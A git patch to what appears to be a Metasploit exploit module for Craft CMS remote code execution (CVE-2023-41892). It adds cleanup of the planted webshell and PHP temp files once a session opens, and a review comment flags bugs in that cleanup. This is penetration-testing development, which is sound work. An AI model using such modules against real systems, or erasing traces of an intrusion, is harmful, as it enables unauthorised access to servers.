From d00249f08349b8eb2c4d1c4af59d930deb5e173e Mon Sep 17 00:00:00 2001
From: h00die-gr3y
Date: Thu, 14 Dec 2023 12:57:07 +0000
Subject: [PATCH] Second release with manual cleanup of php* files
---
 .../craftcms_unauth_rce_cve_2023_41892.rb | 27 ++++++++++++++++++-
 1 file changed, 26 insertions(+), 1 deletion(-)
diff --git a/modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb b/modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb
index 588419578906..41ac6f9e1840 100644
--- a/modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb
+++ b/modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb
@@ -237,6 +237,32 @@ def execute_command(cmd, _opts = {})
     })
   end
 
+  def on_new_session(session)
+    # cleanup webshell in DOCUMENT_ROOT
+    register_files_for_cleanup("#{@config['document_root']}/#{@webshell_name}")
+
+    # Imagick plugin generates a php file with MSL code in the directory set by
+    # the PHP ini setting "upload_tmp_dir". This file gets executed to generate the webshell.
+    # A manual cleanup procedure is required to identify and remove the php* files when the session is established.
+    if session.type == 'meterpreter'
+      session.fs.dir.chdir(@config['upload_tmp_dir'].to_s)
+      clean_files = session.fs.dir.entries
+      unless clean_files.nil? || clean_files.empty?
+        clean_files.each do |f|
+          register_files_for_cleanup("#{@config['upload_tmp_dir']}/#{f}") if f.match(/php+/)
+        end
+      end
+    else
+      clean_files = session.shell_command_token("ls #{@config['upload_tmp_dir']}/php*")
+      unless clean_files.nil? || clean_files.empty?
+        clean_files.split(' ').each do |f|
+          register_files_for_cleanup(f.to_s)
+        end
+      end
+    end
+    super
+  end
+
   def check
     check_phpinfo
     return CheckCode::Appears unless @config['upload_tmp_dir'].nil? || @config['document_root'].nil?
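Review bot: The shell branch of on_new_session registers whatever `ls` prints, so when no `php*` file exists the error text (e.g. `ls: cannot access '/tmp/php*': No such file or directory`) is split on spaces and each token is queued for deletion on session close; on shells that merge stderr into the returned output this happens every time the glob misses. Redirecting stderr, splitting on newlines and only accepting entries that start with the upload_tmp_dir prefix avoids that, as sketched below. The meterpreter branch is looser than the shell one in the opposite direction: `/php+/` is unanchored and matches any directory entry containing `php`, not the `php*` prefix the shell glob targets, so `if f.start_with?('php')` would keep the two branches consistent. Either way, PHP names its own in-flight upload temp files `phpXXXXXX` in the same directory, so this cleanup can remove files the exploit never created; snapshotting the listing before the trigger and deleting only new entries would be more selective, and `session.fs.dir.chdir` leaves the session's cwd changed as a side effect, which `session.fs.dir.entries(path)` would presumably avoid (verify against the stdapi Dir API).
```ruby
    else
      # stderr to /dev/null: an empty glob must not turn ls's error text into cleanup paths
      clean_files = session.shell_command_token("ls -1 #{@config['upload_tmp_dir']}/php* 2>/dev/null")
      unless clean_files.nil? || clean_files.empty?
        clean_files.split("\n").map(&:strip).each do |f|
          register_files_for_cleanup(f) if f.start_with?("#{@config['upload_tmp_dir']}/php")
        end
      end
    end
    # … unchanged: super …
```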
@@ -249,7 +275,6 @@ def exploit
     check_phpinfo unless datastore['AutoCheck']
     fail_with(Failure::NotVulnerable, 'Could not get required phpinfo. System is likely patched.') if @config['upload_tmp_dir'].nil? || @config['document_root'].nil?
     fail_with(Failure::UnexpectedReply, "Webshell #{@webshell_name} upload failed.") unless upload_webshell
-    register_files_for_cleanup(@webshell_name.to_s)
 
     print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
     case target['Type']